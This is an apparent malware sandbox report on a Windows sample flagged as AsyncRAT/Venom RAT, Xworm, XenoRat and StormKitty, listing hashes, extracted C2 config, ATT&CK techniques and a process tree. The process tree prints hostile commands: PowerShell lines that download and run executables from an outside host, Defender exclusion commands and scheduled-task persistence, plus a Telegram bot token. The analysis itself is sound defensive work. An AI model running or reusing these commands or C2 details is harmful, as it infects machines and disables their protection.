asyncrat | 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6

Analysis

max time kernel
150s
max time network
149s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
17/04/2024, 11:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d0685487fa7e474e68a40a1b1ff49b60.exe
Size

167KB
MD5

d0685487fa7e474e68a40a1b1ff49b60
SHA1

069285708e07814d852bbd5f39a7ffbb3c9e2d94
SHA256

87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6
SHA512

eda00ba1453a33024fc05316196ccd71981ba61ababb965d1c3f01251f377047b00d8b6a9b140acf335cfa9d478bb3b6dbc4aca37fe74cfecb929e965ed190a8
SSDEEP

1536:216oQ/DtPFVzE95jNNKCw5VY9bG1wWQkAw6JOXHWIOGoWIFjo7xLFVGy9w04xJXX:ouxFG9Rw3Y9bGVAfOXWxrjCT4

Score

10^/10

asyncrat stormkitty xenorat xworm default persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://xcu.exgaming.click

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://xcu5.exgaming.click

Extracted

Family

xworm

dentiste.ddns.net:7000

86.68.222.14:7000

51.254.53.24:7000

dentiste.ddns.net:7010

Attributes

Install_directory
%AppData%
install_file
Mise à jour carte CPS.exe
telegram
https://api.telegram.org/bot5720516014:AAF4KOAv3GXHFU0RS3g4HPsucKDwQf01__A

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

Mutex

hoyqzolrquxmbnzaee

Attributes

delay
1
install
true
install_file
system.exe
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/ckrnc4Uk

aes.plain

Extracted

Family

xenorat

dentiste.ddns.net

Mutex

Xeno_syteme_update

Attributes

delay
5000
install_path
appdata
port
7011
startup_name
System

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/1632-61-0x0000000000EC0000-0x0000000000ECE000-memory.dmp	disable_win_def

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral1/memory/1632-0-0x0000000000FE0000-0x0000000001010000-memory.dmp	family_xworm
behavioral1/files/0x0007000000016c51-79.dat	family_xworm
behavioral1/memory/704-80-0x0000000000CA0000-0x0000000000CBA000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral1/memory/1632-93-0x000000001CD30000-0x000000001CE50000-memory.dmp	family_stormkitty

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0009000000016a29-66.dat	family_asyncrat

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk	d0685487fa7e474e68a40a1b1ff49b60.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk	d0685487fa7e474e68a40a1b1ff49b60.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fkcvgh.lnk	fkcvgh.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fkcvgh.lnk	fkcvgh.exe

Executes dropped EXE 7 IoCs

pid	Process
2680	epnwqv.exe
2260	hvjmrn.exe
704	fkcvgh.exe
1032	hvjmrn.exe
3036	system.exe
2696	fkcvgh.exe
892	fkcvgh.exe

Loads dropped DLL 1 IoCs

pid	Process
2260	hvjmrn.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Mise à jour carte CPS = "C:\\Users\\Admin\\AppData\\Roaming\\Mise à jour carte CPS.exe"	d0685487fa7e474e68a40a1b1ff49b60.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\fkcvgh = "C:\\Users\\Admin\\AppData\\Roaming\\fkcvgh.exe"	fkcvgh.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
19	pastebin.com
20	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2176	schtasks.exe
972	schtasks.exe
2964	schtasks.exe
2240	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
468	timeout.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1632	d0685487fa7e474e68a40a1b1ff49b60.exe
704	fkcvgh.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3056	powershell.exe
2796	powershell.exe
2724	powershell.exe
2552	powershell.exe
1632	d0685487fa7e474e68a40a1b1ff49b60.exe
288	powershell.exe
2680	epnwqv.exe
2680	epnwqv.exe
2680	epnwqv.exe
2680	epnwqv.exe
1596	powershell.exe
2580	powershell.exe
1236	powershell.exe
2440	powershell.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
2508	powershell.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
560	powershell.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
2752	powershell.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe
3036	system.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

description	pid	Process
Token: SeDebugPrivilege	1632	d0685487fa7e474e68a40a1b1ff49b60.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	1632	d0685487fa7e474e68a40a1b1ff49b60.exe
Token: SeDebugPrivilege	2680	epnwqv.exe
Token: SeDebugPrivilege	704	fkcvgh.exe
Token: SeDebugPrivilege	288	powershell.exe
Token: SeDebugPrivilege	2680	epnwqv.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	3036	system.exe
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	1236	powershell.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	3036	system.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	560	powershell.exe
Token: SeDebugPrivilege	2752	powershell.exe
Token: SeDebugPrivilege	704	fkcvgh.exe
Token: SeDebugPrivilege	1032	hvjmrn.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	2436	powershell.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	2696	fkcvgh.exe
Token: SeDebugPrivilege	892	fkcvgh.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1632	d0685487fa7e474e68a40a1b1ff49b60.exe
3036	system.exe
704	fkcvgh.exe
1032	hvjmrn.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1632 wrote to memory of 3056	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	28
PID 1632 wrote to memory of 3056	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	28
PID 1632 wrote to memory of 3056	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	28
PID 1632 wrote to memory of 2796	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	30
PID 1632 wrote to memory of 2796	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	30
PID 1632 wrote to memory of 2796	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	30
PID 1632 wrote to memory of 2724	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	32
PID 1632 wrote to memory of 2724	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	32
PID 1632 wrote to memory of 2724	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	32
PID 1632 wrote to memory of 2552	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	34
PID 1632 wrote to memory of 2552	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	34
PID 1632 wrote to memory of 2552	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	34
PID 1632 wrote to memory of 2964	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	36
PID 1632 wrote to memory of 2964	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	36
PID 1632 wrote to memory of 2964	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	36
PID 1632 wrote to memory of 2680	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	39
PID 1632 wrote to memory of 2680	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	39
PID 1632 wrote to memory of 2680	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	39
PID 1632 wrote to memory of 2260	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	40
PID 1632 wrote to memory of 2260	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	40
PID 1632 wrote to memory of 2260	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	40
PID 1632 wrote to memory of 2260	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	40
PID 2680 wrote to memory of 2052	2680	epnwqv.exe	41
PID 2680 wrote to memory of 2052	2680	epnwqv.exe	41
PID 2680 wrote to memory of 2052	2680	epnwqv.exe	41
PID 1632 wrote to memory of 704	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	43
PID 1632 wrote to memory of 704	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	43
PID 1632 wrote to memory of 704	1632	d0685487fa7e474e68a40a1b1ff49b60.exe	43
PID 2052 wrote to memory of 288	2052	cmd.exe	44
PID 2052 wrote to memory of 288	2052	cmd.exe	44
PID 2052 wrote to memory of 288	2052	cmd.exe	44
PID 2260 wrote to memory of 1032	2260	hvjmrn.exe	45
PID 2260 wrote to memory of 1032	2260	hvjmrn.exe	45
PID 2260 wrote to memory of 1032	2260	hvjmrn.exe	45
PID 2260 wrote to memory of 1032	2260	hvjmrn.exe	45
PID 2680 wrote to memory of 1892	2680	epnwqv.exe	46
PID 2680 wrote to memory of 1892	2680	epnwqv.exe	46
PID 2680 wrote to memory of 1892	2680	epnwqv.exe	46
PID 2680 wrote to memory of 2112	2680	epnwqv.exe	47
PID 2680 wrote to memory of 2112	2680	epnwqv.exe	47
PID 2680 wrote to memory of 2112	2680	epnwqv.exe	47
PID 1892 wrote to memory of 2240	1892	cmd.exe	50
PID 1892 wrote to memory of 2240	1892	cmd.exe	50
PID 1892 wrote to memory of 2240	1892	cmd.exe	50
PID 2112 wrote to memory of 468	2112	cmd.exe	51
PID 2112 wrote to memory of 468	2112	cmd.exe	51
PID 2112 wrote to memory of 468	2112	cmd.exe	51
PID 2052 wrote to memory of 1596	2052	cmd.exe	52
PID 2052 wrote to memory of 1596	2052	cmd.exe	52
PID 2052 wrote to memory of 1596	2052	cmd.exe	52
PID 2112 wrote to memory of 3036	2112	cmd.exe	53
PID 2112 wrote to memory of 3036	2112	cmd.exe	53
PID 2112 wrote to memory of 3036	2112	cmd.exe	53
PID 3036 wrote to memory of 2732	3036	system.exe	54
PID 3036 wrote to memory of 2732	3036	system.exe	54
PID 3036 wrote to memory of 2732	3036	system.exe	54
PID 2732 wrote to memory of 2580	2732	cmd.exe	56
PID 2732 wrote to memory of 2580	2732	cmd.exe	56
PID 2732 wrote to memory of 2580	2732	cmd.exe	56
PID 704 wrote to memory of 1236	704	fkcvgh.exe	57
PID 704 wrote to memory of 1236	704	fkcvgh.exe	57
PID 704 wrote to memory of 1236	704	fkcvgh.exe	57
PID 704 wrote to memory of 2440	704	fkcvgh.exe	59
PID 704 wrote to memory of 2440	704	fkcvgh.exe	59

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\d0685487fa7e474e68a40a1b1ff49b60.exe
"C:\Users\Admin\AppData\Local\Temp\d0685487fa7e474e68a40a1b1ff49b60.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\d0685487fa7e474e68a40a1b1ff49b60.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'd0685487fa7e474e68a40a1b1ff49b60.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Mise à jour carte CPS.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2552
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Mise à jour carte CPS" /tr "C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
  2⤵
  - Creates scheduled task(s)
  PID:2964
- C:\Users\Admin\AppData\Local\Temp\epnwqv.exe
  "C:\Users\Admin\AppData\Local\Temp\epnwqv.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2680
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:288
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1596
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2752
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1892
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
      4⤵
      Creates scheduled task(s)
      PID:2240
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp6E0F.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2112
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:468
  - - C:\Users\Admin\AppData\Roaming\system.exe
      "C:\Users\Admin\AppData\Roaming\system.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3036
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2732
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2580
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2436
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2528
- C:\Users\Admin\AppData\Local\Temp\hvjmrn.exe
  "C:\Users\Admin\AppData\Local\Temp\hvjmrn.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2260
- - C:\Users\Admin\AppData\Roaming\XenoManager\hvjmrn.exe
    "C:\Users\Admin\AppData\Roaming\XenoManager\hvjmrn.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1032
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /Create /TN "System" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7FE9.tmp" /F
      4⤵
      Creates scheduled task(s)
      PID:2176
- C:\Users\Admin\AppData\Local\Temp\fkcvgh.exe
  "C:\Users\Admin\AppData\Local\Temp\fkcvgh.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fkcvgh.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1236
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fkcvgh.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\fkcvgh.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2508
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "fkcvgh" /tr "C:\Users\Admin\AppData\Roaming\fkcvgh.exe"
    3⤵
    - Creates scheduled task(s)
    PID:972

C:\Windows\system32\taskeng.exe
taskeng.exe {106675B1-4E5A-4F64-96F5-78B27C3A033D} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
1⤵
PID:268
- C:\Users\Admin\AppData\Roaming\fkcvgh.exe
  C:\Users\Admin\AppData\Roaming\fkcvgh.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2696
- C:\Users\Admin\AppData\Roaming\fkcvgh.exe
  C:\Users\Admin\AppData\Roaming\fkcvgh.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4aenpx0p.un0

Filesize
148KB

MD5
90a1d4b55edf36fa8b4cc6974ed7d4c4

SHA1
aba1b8d0e05421e7df5982899f626211c3c4b5c1

SHA256
7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c

SHA512
ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\epnwqv.exe

Filesize
75KB

MD5
a7d63348cfe9b0dc9d3aaec28c76c8f0

SHA1
1b993f554960286e90cfd7cedf4c457e1c46ff80

SHA256
16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54

SHA512
3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

Download Submit
C:\Users\Admin\AppData\Local\Temp\fkcvgh.exe

Filesize
81KB

MD5
d51105f68921195b994396e985fbfdbc

SHA1
3e6bbb261ceb5329cda79b024bdf6fed8e5162b3

SHA256
367c1eadd33c8f7a9801654054a1879e44b43aafdf3b672862567c264030490c

SHA512
55e5ad7779963895a53e4778631a9c98042a7c3203620e4bc4f168eaa402e2f87827624789f017a5e6b0a4fb51464fde75e4d8e5b8471325e2d958f0f676d390

Download Submit
C:\Users\Admin\AppData\Local\Temp\hvjmrn.exe

Filesize
45KB

MD5
a2eea60f1991928460eca53fb86f127b

SHA1
b5d31c9b199a9754a3ee7d7b9d35f8a98ed3b340

SHA256
373c2274f9add075ba56475a4ac45a313b118fbf88c2025923870c25e794a1a7

SHA512
7e3f2551fa8aebb04ad811613b934af4c930e79b1f743d8ddf0bc6cf92c9fb23f6500e38b315fe7bd59bc582de3c759f7016f51d03aa5fc826eba0c515125876

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6E0F.tmp.bat

Filesize
150B

MD5
ae8469f40adffd8a952774afa92230dc

SHA1
90e7987e571c0505119b20eb6f6d34739f6d9a69

SHA256
3cc605d97d98128263482112ce11ddd6926ce676720ce871c431b7461a70031c

SHA512
9ccddd71ea0b7ce507d0c7786666c2914774dcf9568bd1b46b432df26c316959f4e549468ce22a2b6c3018724dab8382db3fb94488082d79c9721fd625e4429c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7FE9.tmp

Filesize
1KB

MD5
7a44dc9195319d9287351a27f9f54da7

SHA1
af745f67b329163cb2747079af09851b65e75e85

SHA256
081155e2092853b8fe11ed0d2c43f771621825d26db95fcfdb695c08a6606dab

SHA512
373aa6833c745fbdf2a11301a492cc4837ebfbb3966c85801e2f68ee8e63ec15e1a1f7183e098e83744813d01f8148aa851ced7979739aa9dcf52b46564796d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\uinsg41n.fe0

Filesize
92KB

MD5
69b4e9248982ac94fa6ee1ea6528305f

SHA1
6fb0e765699dd0597b7a7c35af4b85eead942e5b

SHA256
53c5e056da67d60a3b2872f8d4bda857f687be398ed05ed17c102f4c4b942883

SHA512
5cb260ab12c8cf0f134c34ae9533ac06227a0c3bdb9ad30d925d3d7b96e6fae0825c63e7db3c78852dc2a053767bbcfdd16898531509ffadade2dd7149f6241d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a08e130b3f1be003c1b9de757427ca8b

SHA1
43ad17b6545ce96a7b4703d70867fb943a9ad2b4

SHA256
2b2479b633eff429d45087d27739930bbbbe32362fb8dee8f12b735f674c810d

SHA512
8e111bb38f0bfa35762dc94cb0a6250457ed9fd7140ea114d3680325da2db1f7fdb6c2f4245a88cbc8898dfe8f56dd151a465adf4d79bb0b91cd0bcbf9b734b3

Download Submit
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

Filesize
8B

MD5
cf759e4c5f14fe3eec41b87ed756cea8

SHA1
c27c796bb3c2fac929359563676f4ba1ffada1f5

SHA256
c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

SHA512
c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

Download Submit
memory/288-95-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/288-92-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

Filesize
9.6MB

Download
memory/288-144-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

Filesize
9.6MB

Download
memory/288-89-0x00000000027D0000-0x00000000027D8000-memory.dmp

Filesize
32KB

Download
memory/288-87-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/288-106-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/288-90-0x000007FEED650000-0x000007FEEDFED000-memory.dmp

Filesize
9.6MB

Download
memory/288-96-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/288-91-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/704-143-0x000000001B640000-0x000000001B6C0000-memory.dmp

Filesize
512KB

Download
memory/704-105-0x000007FEF5AD0000-0x000007FEF64BC000-memory.dmp

Filesize
9.9MB

Download
memory/704-80-0x0000000000CA0000-0x0000000000CBA000-memory.dmp

Filesize
104KB

Download
memory/1032-103-0x0000000000C90000-0x0000000000CA2000-memory.dmp

Filesize
72KB

Download
memory/1032-107-0x00000000749A0000-0x000000007508E000-memory.dmp

